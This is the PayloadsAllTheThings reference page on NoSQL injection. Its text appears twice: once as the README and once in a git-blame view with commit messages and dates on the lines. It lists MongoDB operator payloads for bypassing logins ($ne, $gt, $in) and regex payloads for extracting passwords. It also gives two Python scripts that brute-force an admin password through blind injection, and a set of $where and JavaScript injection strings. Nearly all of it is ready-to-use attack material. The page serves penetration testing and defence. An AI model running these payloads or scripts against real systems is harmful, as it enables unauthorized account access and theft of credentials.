PayloadsAllTheThings/NoSQL Injection/README.md

# NoSQL injection

NoSQL databases provide looser consistency restrictions than traditional SQL databases. By requiring fewer relational constraints and consistency checks, NoSQL databases often offer performance and scaling benefits. Yet these databases are still potentially vulnerable to injection attacks, even if they aren't using the traditional SQL syntax.

## Exploit

Basic authentication bypass using not equal ($ne) or greater ($gt)

```json
in URL
username[$ne]=toto&password[$ne]=toto

in JSON
{"username": {"$ne": null}, "password": {"$ne": null}}
{"username": {"$ne": "foo"}, "password": {"$ne": "bar"}}
{"username": {"$gt": undefined}, "password": {"$gt": undefined}}
{"username": {"$gt":""}, "password": {"$gt":""}}
```

Extract length information

```json
username[$ne]=toto&password[$regex]=.{1}
username[$ne]=toto&password[$regex]=.{3}
```

Extract data information

```json
in URL
username[$ne]=toto&password[$regex]=m.{2}
username[$ne]=toto&password[$regex]=md.{1}
username[$ne]=toto&password[$regex]=mdp

username[$ne]=toto&password[$regex]=m.*
username[$ne]=toto&password[$regex]=md.*

in JSON
{"username": {"$eq": "admin"}, "password": {"$regex": "^m" }}
{"username": {"$eq": "admin"}, "password": {"$regex": "^md" }}
{"username": {"$eq": "admin"}, "password": {"$regex": "^mdp" }}
```

Extract data with "in"

```json
{"username":{"$in":["Admin", "4dm1n", "admin", "root", "administrator"]},"password":{"$gt":""}}
```


## Blind NoSQL

### POST with JSON body


```python
import requests
import urllib3
import string
import urllib
urllib3.disable_warnings()

username="admin"
password=""
u="http://example.org/login"
headers={'content-type': 'application/json'}

while True:
    for c in string.printable:
        if c not in ['*','+','.','?','|']:
            payload='{"username": {"$eq": "%s"}, "password": {"$regex": "^%s" }}' % (username, password + c)
            r = requests.post(u, data = payload, headers = headers, verify = False)
            if 'OK' in r.text:
                print("Found one more char : %s" % (password+c))
                password += c
```

### GET

```python
import requests
import urllib3
import string
import urllib
urllib3.disable_warnings()

username='admin'
password=''
u='http://example.org/login'

while True:
  for c in string.printable:
    if c not in ['*','+','.','?','|', '#', '&', '$']:
      payload='?username=%s&password[$regex]=^%s' % (username, password + c)
      r = requests.get(u + payload)
      if 'Yeah' in r.text:
        print("Found one more char : %s" % (password+c))
        password += c
```

## MongoDB Payloads

```bash
true, $where: '1 == 1'
, $where: '1 == 1'
$where: '1 == 1'
', $where: '1 == 1'
1, $where: '1 == 1'
{ $ne: 1 }
', $or: [ {}, { 'a':'a
' } ], $comment:'successful MongoDB injection'
db.injection.insert({success:1});
db.injection.insert({success:1});return 1;db.stores.mapReduce(function() { { emit(1,1
|| 1==1
' && this.password.match(/.*/)//+%00
' && this.passwordzz.match(/.*/)//+%00
'%20%26%26%20this.password.match(/.*/)//+%00
'%20%26%26%20this.passwordzz.match(/.*/)//+%00
{$gt: ''}
[$ne]=1
```

## References

* [Les NOSQL injections Classique et Blind: Never trust user input - Geluchat](https://www.dailysecurity.fr/nosql-injections-classique-blind/)
* [Testing for NoSQL injection - OWASP](https://www.owasp.org/index.php/Testing_for_NoSQL_injection)
* [cr0hn - NoSQL injection wordlists](https://github.com/cr0hn/nosqlinjection_wordlists)
* [Zanon - NoSQL Injection in MongoDB](https://zanon.io/posts/nosql-injection-in-mongodb)
NOSQL injection added + updates XSS/XXE 2016-10-30 11:53:32 +00:00			`# NoSQL injection`
Markdown formatting update 2018-08-12 21:30:22 +00:00
NOSQL injection added + updates XSS/XXE 2016-10-30 11:53:32 +00:00			`NoSQL databases provide looser consistency restrictions than traditional SQL databases. By requiring fewer relational constraints and consistency checks, NoSQL databases often offer performance and scaling benefits. Yet these databases are still potentially vulnerable to injection attacks, even if they aren't using the traditional SQL syntax.`

			`## Exploit`

Traversal Dir + NoSQL major updates + small addons 2018-02-15 22:27:42 +00:00			`Basic authentication bypass using not equal ($ne) or greater ($gt)`
Markdown formatting update 2018-08-12 21:30:22 +00:00
			```json
Traversal Dir + NoSQL major updates + small addons 2018-02-15 22:27:42 +00:00			`in URL`
NOSQL injection added + updates XSS/XXE 2016-10-30 11:53:32 +00:00			`username[$ne]=toto&password[$ne]=toto`
Traversal Dir + NoSQL major updates + small addons 2018-02-15 22:27:42 +00:00
			`in JSON`
Web socket + title capitalization 2019-03-06 23:03:25 +00:00			`{"username": {"$ne": null}, "password": {"$ne": null}}`
			`{"username": {"$ne": "foo"}, "password": {"$ne": "bar"}}`
			`{"username": {"$gt": undefined}, "password": {"$gt": undefined}}`
			`{"username": {"$gt":""}, "password": {"$gt":""}}`
NOSQL injection added + updates XSS/XXE 2016-10-30 11:53:32 +00:00			```

			`Extract length information`
Markdown formatting update 2018-08-12 21:30:22 +00:00
			```json
NOSQL injection added + updates XSS/XXE 2016-10-30 11:53:32 +00:00			`username[$ne]=toto&password[$regex]=.{1}`
			`username[$ne]=toto&password[$regex]=.{3}`
			```

			`Extract data information`
Markdown formatting update 2018-08-12 21:30:22 +00:00
			```json
Traversal Dir + NoSQL major updates + small addons 2018-02-15 22:27:42 +00:00			`in URL`
NOSQL injection added + updates XSS/XXE 2016-10-30 11:53:32 +00:00			`username[$ne]=toto&password[$regex]=m.{2}`
			`username[$ne]=toto&password[$regex]=md.{1}`
			`username[$ne]=toto&password[$regex]=mdp`

			`username[$ne]=toto&password[$regex]=m.*`
			`username[$ne]=toto&password[$regex]=md.*`
Traversal Dir + NoSQL major updates + small addons 2018-02-15 22:27:42 +00:00
			`in JSON`
			`{"username": {"$eq": "admin"}, "password": {"$regex": "^m" }}`
			`{"username": {"$eq": "admin"}, "password": {"$regex": "^md" }}`
			`{"username": {"$eq": "admin"}, "password": {"$regex": "^mdp" }}`
			```

Web socket + title capitalization 2019-03-06 23:03:25 +00:00			`Extract data with "in"`

MarkDown typo 2019-03-18 23:06:22 +00:00			```json
Web socket + title capitalization 2019-03-06 23:03:25 +00:00			`{"username":{"$in":["Admin", "4dm1n", "admin", "root", "administrator"]},"password":{"$gt":""}}`
			```


Traversal Dir + NoSQL major updates + small addons 2018-02-15 22:27:42 +00:00			`## Blind NoSQL`
Markdown formatting update 2018-08-12 21:30:22 +00:00
add nosqli GET example 2019-04-21 11:00:16 +00:00			`### POST with JSON body`


Traversal Dir + NoSQL major updates + small addons 2018-02-15 22:27:42 +00:00			```python
			`import requests`
			`import urllib3`
			`import string`
			`import urllib`
			`urllib3.disable_warnings()`

			`username="admin"`
			`password=""`
add nosqli GET example 2019-04-21 11:00:16 +00:00			`u="http://example.org/login"`
add JSON headers 2019-04-24 20:59:24 +00:00			`headers={'content-type': 'application/json'}`
Traversal Dir + NoSQL major updates + small addons 2018-02-15 22:27:42 +00:00
			`while True:`
			`for c in string.printable:`
			`if c not in ['*','+','.','?','\|']:`
			`payload='{"username": {"$eq": "%s"}, "password": {"$regex": "^%s" }}' % (username, password + c)`
add JSON headers 2019-04-24 20:59:24 +00:00			`r = requests.post(u, data = payload, headers = headers, verify = False)`
Traversal Dir + NoSQL major updates + small addons 2018-02-15 22:27:42 +00:00			`if 'OK' in r.text:`
			`print("Found one more char : %s" % (password+c))`
			`password += c`
NOSQL injection added + updates XSS/XXE 2016-10-30 11:53:32 +00:00			```

add nosqli GET example 2019-04-21 11:00:16 +00:00			`### GET`

			```python
			`import requests`
			`import urllib3`
			`import string`
			`import urllib`
			`urllib3.disable_warnings()`

			`username='admin'`
			`password=''`
			`u='http://example.org/login'`

			`while True:`
			`for c in string.printable:`
			`if c not in ['*','+','.','?','\|', '#', '&', '$']:`
			`payload='?username=%s&password[$regex]=^%s' % (username, password + c)`
			`r = requests.get(u + payload)`
			`if 'Yeah' in r.text:`
			`print("Found one more char : %s" % (password+c))`
			`password += c`
			```

Methodology updated with RPCClient, User enumeration 2017-05-17 18:40:45 +00:00			`## MongoDB Payloads`
Markdown formatting update 2018-08-12 21:30:22 +00:00
			```bash
Methodology updated with RPCClient, User enumeration 2017-05-17 18:40:45 +00:00			`true, $where: '1 == 1'`
			`, $where: '1 == 1'`
			`$where: '1 == 1'`
			`', $where: '1 == 1'`
			`1, $where: '1 == 1'`
			`{ $ne: 1 }`
			`', $or: [ {}, { 'a':'a`
			`' } ], $comment:'successful MongoDB injection'`
			`db.injection.insert({success:1});`
			`db.injection.insert({success:1});return 1;db.stores.mapReduce(function() { { emit(1,1`
			`\|\| 1==1`
			`' && this.password.match(/.*/)//+%00`
			`' && this.passwordzz.match(/.*/)//+%00`
			`'%20%26%26%20this.password.match(/.*/)//+%00`
			`'%20%26%26%20this.passwordzz.match(/.*/)//+%00`
			`{$gt: ''}`
			`[$ne]=1`
			```

Adding references sectio 2018-12-24 14:02:50 +00:00			`## References`
Markdown formatting update 2018-08-12 21:30:22 +00:00
			`* [Les NOSQL injections Classique et Blind: Never trust user input - Geluchat](https://www.dailysecurity.fr/nosql-injections-classique-blind/)`
			`* [Testing for NoSQL injection - OWASP](https://www.owasp.org/index.php/Testing_for_NoSQL_injection)`
			`* [cr0hn - NoSQL injection wordlists](https://github.com/cr0hn/nosqlinjection_wordlists)`
			`* [Zanon - NoSQL Injection in MongoDB](https://zanon.io/posts/nosql-injection-in-mongodb)`